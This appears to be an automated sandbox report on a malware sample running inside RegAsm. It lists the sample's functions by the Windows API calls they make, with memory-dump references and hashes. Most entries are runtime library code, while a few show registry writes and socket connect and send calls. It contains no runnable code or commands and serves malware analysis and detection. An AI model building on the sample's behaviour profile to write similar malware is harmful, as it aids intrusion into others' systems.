                                                                                                                                  Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                  • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                  • RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1818849710-0
                                                                                                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                  Function 004187AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                                                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02084830,00000010), ref: 004048E0
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GdiplusStartupconnectsend
                                                                                                                                  • String ID: NG
                                                                                                                                  • API String ID: 1957403310-1651712548
                                                                                                                                  • Opcode ID: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                                                                                                                  • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                                                                                                                                  • Opcode Fuzzy Hash: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                                                                                                                  • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                                                                                                                                  Function 0044EE44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                                                  • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                  • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                                                                  • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                  • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                                                                  Function 10005C45 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __crt_fast_encode_pointer
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 3768137683-2459865102
                                                                                                                                  • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                  • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                  • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                  • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                  Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID: pQG
                                                                                                                                  • API String ID: 176396367-3769108836
                                                                                                                                  • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                                                  • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                                                  Function 00448C33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String
                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                  • API String ID: 2568140703-3893581201
                                                                                                                                  • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                  • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                                                  • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                  • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                                                  Function 00448B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                                                                  Strings
                                                                                                                                  • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                  • String ID: InitializeCriticalSectionEx
                                                                                                                                  • API String ID: 2593887523-3084827643
                                                                                                                                  • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                  • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                                                                  • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                  • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                                                                  Function 00448790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Alloc
                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                  • API String ID: 2773662609-671089009
                                                                                                                                  • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                  • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                                                                  • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                  • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                                                                  Function 004489D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                                  Strings
                                                                                                                                  • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                  • API String ID: 2086374402-595813830
                                                                                                                                  • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                  • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                                  • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                  • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                                  Function 0041B80C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B824
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 1890195054-2766056989
                                                                                                                                  • Opcode ID: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                                                                                                                  • Instruction ID: 3917006bb4bdf28dbebd301c315ba2c969ca89c82ab29e5da1363915d2377671
                                                                                                                                  • Opcode Fuzzy Hash: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                                                                                                                  • Instruction Fuzzy Hash: EBE0C9B6901228EBCB10DFA9E94498DFBF8FF48620B008166ED08A3704D770A815CB94
                                                                                                                                  Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                  • API String ID: 2742660187-671089009
                                                                                                                                  • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                  • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                                                                  • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                  • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                                                                  Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                  • API String ID: 2742660187-671089009
                                                                                                                                  • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                  • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                  • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                  • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                                  Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 1890195054-2766056989
                                                                                                                                  • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                  • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                                                  • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                  • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                                  Function 0044F199 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                                                                  • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                  • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                  • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                                                                  • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                  • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                                                                  Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                    • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                                                    • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                                                    • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                  • _free.LIBCMT ref: 0044F050
                                                                                                                                  • _free.LIBCMT ref: 0044F086
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2991157371-0
                                                                                                                                  • Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                                                                                                  • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                                                                  • Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                                                                                                  • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                                                                  Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                    • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                    • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                    • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                    • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                    • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                    • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                  • _free.LIBCMT ref: 10006CD7
                                                                                                                                  • _free.LIBCMT ref: 10006D0D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2991157371-0
                                                                                                                                  • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                  • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                  • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                  • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                                  Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2279764990-0
                                                                                                                                  • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                  • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                                  • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                  • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                                  Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00446227
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
